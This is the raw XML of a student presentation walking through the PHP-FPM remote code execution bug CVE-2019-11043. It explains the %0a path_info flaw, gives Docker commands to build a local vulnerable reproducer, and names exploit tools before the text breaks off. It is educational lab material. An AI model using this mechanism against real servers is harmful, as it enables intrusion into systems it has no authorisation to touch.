        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Pritchard, Aaron" userId="f0edbfdc-7ebe-4c39-a895-e5fe6ff05150" providerId="ADAL" clId="{EAFE59D1-7879-4A0E-9D58-C94F3307F06B}" dt="2021-04-27T13:20:54.067" v="8419" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1047299313" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Pritchard, Aaron" userId="f0edbfdc-7ebe-4c39-a895-e5fe6ff05150" providerId="ADAL" clId="{EAFE59D1-7879-4A0E-9D58-C94F3307F06B}" dt="2021-04-07T21:50:16.194" v="4853" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1047299313" sldId="267"/>
            <ac:spMk id="2" creationId="{12382028-9975-4343-A04F-2885435080D7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Pritchard, Aaron" userId="f0edbfdc-7ebe-4c39-a895-e5fe6ff05150" providerId="ADAL" clId="{EAFE59D1-7879-4A0E-9D58-C94F3307F06B}" dt="2021-04-09T16:18:30.129" v="8400" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1047299313" sldId="267"/>
            <ac:spMk id="3" creationId="{5090BA95-F5D7-44C4-8277-839479576A0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7T22:02:13.9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89,'576'0,"-557"-1,1-1,29-7,-29 5,0 1,28-1,1922 2,-936 4,-1013-3,-1-1,27-6,-26 4,0 1,25-1,-2 4,-16 1,0-2,0 0,53-11,-31 1,1 3,0 2,96 0,-128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9T16:13:34.8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98,'21'-2,"0"0,0-2,0-1,-1 0,24-10,40-10,-49 18,0 2,0 1,51 1,-51 1,45-6,-45 3,46 0,1095 6,-638-2,-515 3,0 0,1 2,29 8,-29-6,-1-1,1-1,31 1,3-6,-28-1,-1 2,1 2,0 0,32 8,-34-5,0-2,1-1,-1 0,48-6,-35 2,48 4,-27 7,-40-5,1-1,24 0,-15-2,0 2,44 8,-27-6,1-1,90-6,-37-1,-53 5,73 11,-77-9,88-2,-93-4,-1 2,1 2,42 8,-33-4,0-1,1-3,60-5,-8 1,-56 1,-1-1,58-11,-22 7,-61 5,-1 0,33-7,-14 3,-1 0,0 3,77 5,-25-1,1333-2,-1423 0,1 0,-1-1,1 1,0 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 0,0 0,-1 0,1 0,-1 0,1 1,-1-1,1 0,-1 0,1 1,-1-1,1 0,-1 1,1-1,-1 1,1-1,-1 0,1 1,-1 0,-16 10,-37 10,51-20,-32 11,-149 48,152-52,0-2,-1-1,1-2,-36 0,-510-3,558-2,0 0,0-1,-35-10,34 7,-1 2,-38-5,29 6,-56-13,57 9,-58-5,-47-8,43 10,62 6,-44-2,-40-3,75 4,-41 0,39 6,-4 0,1-1,-81-13,92 9,1 0,-42 2,40 2,1-1,-37-7,15 1,-1 3,1 2,-58 5,3 0,-1142-3,1156-11,69 7,-46-2,-582 7,638-2,0-1,0-1,0 0,-24-8,24 6,0 1,0 0,0 1,-26-1,-441 5,310 20,144-19,1 1,-48 11,48-8,0 0,-51 1,-8 4,39-3,-3 1,26-5,1-1,-30 1,-100 15,116-19,21-1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php/php-src/commit/ab061f95ca966731b1c84cf5b7b20155c0a1c06a#diff-624bdd47ab6847d777e15327976a9227"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twitter.com/chybeta/status/1187213401124036608?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1187213401124036608&amp;ref_url=https%3A%2F%2Fwww.tenable.com%2Fblog%2Fcve-2019-11043-vulnerability-in-php-fpm-could-lead-to-remote-code-execution-on-nginx" TargetMode="Externa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olang.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apid7/metasploit-framework/wiki/Nightly-Install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s://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-573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00A3-E0E5-4586-9564-AAE423C68BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Php-FPM exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(CVE-2019-11043) walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E821D8B9-8B5C-4AC8-969A-849603399F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aaron Pritchard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSC385</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33851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125-9EC3-4623-B956-717F566AC242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411577" y="-11169"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So what the heck is going on </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8201CBC-E3FE-4E13-9D4A-358F5346A1D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212974" y="1267691"/>
            <a:ext cx="9905999" cy="3932166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To see why this exploit works, let’s check out what they did to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The problem involves the path info variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A fastcgi path regular expression can be broken by using the encoded newline character (%0a). This causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>path_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> above to be empty. This means that the value of any requested address can be set to 0, allowing an exploiter to prepend commands to a query through a careful selection of bytes. A more detailed explanation is provided below.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6369496F-82E1-473D-B991-58E02733E8FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1648969" y="1658143"/>
            <a:ext cx="6012595" cy="1527502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1339480-332C-48F6-B5A6-AD622D2BECD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1648969" y="5199857"/>
            <a:ext cx="9167854" cy="1366025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15746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F391-7005-45CB-8EA8-0D339FC993BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An Even more verbose explanation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2445BF7E-7554-4394-ABA6-35A4723250EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2289802"/>
            <a:ext cx="4303852" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B5038F-9027-47EB-8736-F5909692B9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219527" y="2097088"/>
            <a:ext cx="5070339" cy="3535046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9E1A74-71A4-4CD8-9730-AF5C1FDEC756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7532347" y="1824113"/>
            <a:ext cx="3880237" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The provided config file</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98999B8-4FF7-41DC-A06D-A368A0BE8484}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6861788" y="3792553"/>
              <a:ext cx="1605600" cy="32400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Ink 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698999B8-4FF7-41DC-A06D-A368A0BE8484}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6807788" y="3684553"/>
                <a:ext cx="17132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13285D1-76FE-4025-8AD7-1110C7179EA5}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7141735" y="3885513"/>
              <a:ext cx="2472840" cy="84240"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C13285D1-76FE-4025-8AD7-1110C7179EA5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7088095" y="3777513"/>
                <a:ext cx="2580480" cy="299880"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46F872F-07B1-48D8-9173-CE0433C493B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910959" y="5720443"/>
            <a:ext cx="6008953" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Nextcloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> providing a similar dangerous config file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52483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84FD-E0CA-4BF1-BFE1-A7E1C781037C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To follow along</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF708421-C47D-4F77-8F8F-5CD13D18641F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1627909"/>
            <a:ext cx="9905999" cy="4163292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for your operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to the provided Dockerfile in the “reproducer” folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This folder contains a Dockerfile, necessary files and configs to prop up an Nginx server running php and php-fpm. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the following commands to build and run the system we will be exploiting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>docker build -t reproduce-cve-2019-11043 .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t forget the .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This could take several minutes depending on your computer and download speed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will prop up an Nginx server running php-fpm on the branch containing the exploitable code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5080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02B4-5E61-43AC-843C-8FEEB1827F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify That the server is running</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBD840B9-3CFF-4EE8-B805-1C5584FDCA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="769262" y="3427760"/>
            <a:ext cx="9790071" cy="1271844"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C50672C-0FF9-4192-A5AE-294ABD2AE8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="789403" y="2739234"/>
            <a:ext cx="9769930" cy="555636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D575170-F4EF-469D-8156-1BD2216023B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033669" y="1978867"/>
            <a:ext cx="9027984" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can run the following command or check in the Docker GUI to see if your container is running.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409258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CA2F-CC76-4A10-8276-63CFD6AEB11B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="521536"/>
            <a:ext cx="11312236" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, Let’s try the exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49736379-1E6F-4356-B308-D1BCD471FF84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a few ways to run this exploit, I will go over two of them, one provided by the original exploit creator, and another method that I have used during the semester for exploiting machines on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HackTheBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that contains a rewritten version of the exploit for Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312162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494A-F46A-4906-B8F4-7F74D18C0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>neex’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> go Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3538331D-7290-4280-B6FC-821C56568F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4100513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>GO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
